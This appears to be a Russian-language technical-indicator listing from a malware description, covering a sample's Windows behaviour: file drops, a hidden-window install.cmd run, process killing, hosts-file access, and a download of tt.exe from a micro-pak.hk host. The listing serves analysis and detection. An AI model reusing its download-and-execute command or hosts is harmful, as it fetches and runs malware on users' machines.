Техническая информация
- '%WINDIR%\syswow64\taskkill.exe' /im "praetorian.exe"
- C:\новая папка\install.cmd
- C:\новая папка\drv.dll
- C:\новая папка\win.exe
- <DRIVERS>\etc\hosts
- 'co##############e-chains.prod.autograph.services.mozaws.net':443
- DNS ASK cr####.micro-pak.hk
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- ClassName: '' WindowName: ''
- 'C:\новая папка\win.exe' http://cru-45.micro-pak.hk/tt.exe
- '%WINDIR%\syswow64\cmd.exe' /c ""C:\Новая папка\install.cmd" " (со скрытым окном)
- '%WINDIR%\syswow64\tasklist.exe'
- '%WINDIR%\syswow64\find.exe' /i "win.exe"